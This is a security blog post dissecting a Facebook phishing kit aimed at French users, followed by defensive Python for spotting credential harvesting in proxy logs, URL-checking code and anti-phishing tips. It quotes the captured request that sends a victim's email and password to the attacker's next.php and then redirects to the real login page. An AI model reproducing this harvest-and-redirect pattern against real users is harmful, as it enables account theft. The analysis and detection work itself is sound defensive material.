Today I discovered a new Facebook phishing site targeting French users. The login page looks identical to the official Facebook site, but instead of logging the victim in, the phishing site passes the victim's credentials through its own submission form (next.php on the attacker's domain) and then redirects them to the official Facebook login page, so all the victim sees is a login prompt appearing a second time.

Fake Facebook Login Page (screenshot)

Source: (screenshot of the phishing page's HTML source)

Connection:

(Passing the victim's credentials over to the attacker)

GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F

(Redirecting to the official Facebook login page)

302 Moved Temporarily to https://login.facebook.com/login.php

Two details are worth noting. The fake form submits with GET, so the e-mail address and password travel in the query string; the attacker does not even need a script that stores them, the web server's access log already has everything. And the parameter names (charset_test, locale, email, pass, pass_placeholder) appear to be copied from the genuine Facebook login form, which is why the page's source looks so convincing at a glance.
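The exchange above is easy to spot in proxy or web-gateway logs once you know the shape: a request carrying Facebook login fields to a host outside facebook.com, answered with a redirect to the genuine login page. The following is an added example written for this post, not code from the phishing kit; the records are constructed from the captured request (with hxxp refanged to http), and the simplified (method, url, status, location) tuple format is an assumption rather than any real proxy's log format.

```python
"""Flag the harvest-then-redirect pattern above in HTTP proxy records.

Added example for this post, not code from the phishing kit. The records
below are constructed from the captured exchange (hxxp refanged to http);
the (method, url, status, location) tuple format is an assumed, simplified
proxy log, not any real product's format.
"""
from urllib.parse import parse_qs, urlsplit

# Field names the kit copies from the genuine Facebook login form.
CREDENTIAL_FIELDS = {"email", "pass"}
LEGIT_DOMAINS = ("facebook.com",)

# Constructed records: the captured exfiltration + redirect, a benign login
# to the real site, and an unrelated redirect on the attacker's host.
SAMPLE_RECORDS = [
    ("GET",
     "http://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4"
     "%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR"
     "&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe"
     "&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F",
     302, "https://login.facebook.com/login.php"),
    ("POST", "https://login.facebook.com/login.php", 302,
     "https://www.facebook.com/home.php"),
    ("GET", "http://www.facebook-online.com/", 302,
     "http://www.facebook-online.com/index.php"),
]


def is_legit_host(host):
    """True only for facebook.com itself or a subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def credentials_in_url(url):
    """Credential fields carried in the query string. A GET submission
    leaks them into the attacker's access log; a POST body would not
    show up here, so this check covers the kit as captured, not every kit."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items() if k in CREDENTIAL_FIELDS}


def find_harvesting(records):
    """Return one finding per request that sends Facebook login fields to a
    host outside facebook.com, noting whether it then bounced the victim
    to the genuine login page (the tell-tale 302 in the capture above)."""
    findings = []
    for index, (method, url, status, location) in enumerate(records):
        host = urlsplit(url).hostname
        creds = credentials_in_url(url)
        if is_legit_host(host) or not creds:
            continue
        bounced = status in (301, 302, 303, 307) and is_legit_host(
            urlsplit(location or "").hostname)
        findings.append({
            "record": index,
            "method": method,
            "host": host,
            "email": creds.get("email"),
            "password_in_url": "pass" in creds,
            "bounced_to_facebook": bounced,
        })
    return findings


if __name__ == "__main__":
    for finding in find_harvesting(SAMPLE_RECORDS):
        print(finding)
```

Run against the constructed records, only the first one is flagged: the real login POST goes to a facebook.com host and the bare redirect on facebook-online.com carries no credentials. On real logs, widen CREDENTIAL_FIELDS to whatever the targeted site's form uses, and treat a hit with bounced_to_facebook set as a near-certain kit rather than a false positive.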


Even though this is a run-of-the-mill phishing attack, we have noticed an uptrend in phishing attacks, especially against social networks. The attackers can do many things with harvested accounts, but one of the most common is to collect as many accounts as possible before unleashing mass spamvertising or even full-blown malware campaigns from them, since a link posted by a friend's account gets clicked far more readily than one in a stranger's e-mail.

 Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

  • Remember, Facebook will never ask for your password in
    an email, Facebook message, or any medium that isn't the login page.
    Though you will need to re-enter your password when you set a security
    question, change your contact email, or send a virtual gift.
  • Be extra aware of weird Wall posts. Don't click on any links, on a Wall or elsewhere, if you don't know where they go.
  • Set a security question for yourself on your Account
    page. If somehow something malicious shuts you out of your account, you
    will need the answer to that question in order for our User Operations
    team to let you back in. (If you've already set your security question,
    you won't see a prompt for it on your Account page.)
  • Be extra aware of what website you are using to log in to Facebook
    (and other websites). Phishing websites can be made to look like other
    websites (like the Facebook login page), and might try to disguise
    their URLs. Be smart: www.facebook.com.profile.a36h8su2m8.info/login
    starts out looking like a legitimate Facebook website, but that
    a36h8su2m8.info part means it's fraudulent. Set and use a browser
    bookmark to make sure you always log in from facebook.com.
  • If you see a Wall post that looks like spam on a friend's Wall, tell the author to delete it and reset their password immediately.
  • Use a modern web browser to benefit from anti-phishing protection.
  • Check out opendns.com. This is another method for blocking specific domains that host phishing sites.
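The URL lesson in the tips quoted above is the one users get wrong most often: the part that matters is not where the host name starts but where it ends. The example below is added here and is not part of the Facebook post; it reduces a host name to its registered domain and judges the tips' own disguised URL, this post's facebook-online.com, and (going one step beyond the tips) the user@host trick, where facebook.com appears before an @ sign and the browser connects to whatever follows it. The suffix set is a constructed stand-in for the Public Suffix List.

```python
"""Pick apart the disguised URL from the tips above.

Added example; not code from the Facebook post. The suffix set is a
constructed stand-in for the Public Suffix List, so a production check
should use the real list (for example via the publicsuffix2 package).
"""
from urllib.parse import urlsplit

PUBLIC_SUFFIXES = {"com", "net", "org", "info", "co.uk"}  # constructed subset
TRUSTED_DOMAINS = {"facebook.com"}


def registrable_domain(host):
    """Return the part of host that somebody actually registered:
    the longest known public suffix plus the one label before it.
    Everything to the left of that is a subdomain the registrant
    can name however they like, including 'www.facebook.com'."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:]) if i > 0 else None
    return None


def login_host(url):
    """Host the browser would actually connect to. urlsplit discards any
    user@ prefix, so www.facebook.com@a36h8su2m8.info resolves to
    a36h8su2m8.info, exactly as a browser does."""
    if "://" not in url:
        url = "http://" + url          # bare host/path, as written in the tips
    return urlsplit(url).hostname or ""


def is_trusted_login_url(url):
    """True only when the registered domain is one we trust with a password."""
    return registrable_domain(login_host(url)) in TRUSTED_DOMAINS


def explain(url):
    """Human-readable verdict showing which part of the URL decided it."""
    host = login_host(url)
    owner = registrable_domain(host)
    verdict = "genuine" if owner in TRUSTED_DOMAINS else "fraudulent"
    return f"{url}\n  host: {host}\n  registered domain: {owner}\n  {verdict}"


if __name__ == "__main__":
    for u in (
        "www.facebook.com.profile.a36h8su2m8.info/login",  # from the tips
        "https://login.facebook.com/login.php",            # the real login page
        "hxxp://www.facebook-online.com/next.php",          # this post's kit
        "http://www.facebook.com@a36h8su2m8.info/login",    # userinfo trick (added)
    ):
        print(explain(u))
```

The bookmark advice in the tips is the user-side equivalent of this check: a bookmark fixes the registered domain once, so no amount of prefixing or @-tricks in a link can move the login elsewhere.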

Make sure that you have an up-to-date anti-malware solution with web filtering running at all times: it can block known phishing domains before the fake login page even loads, and it is your backstop against the malware campaigns that harvested accounts are later used to spread.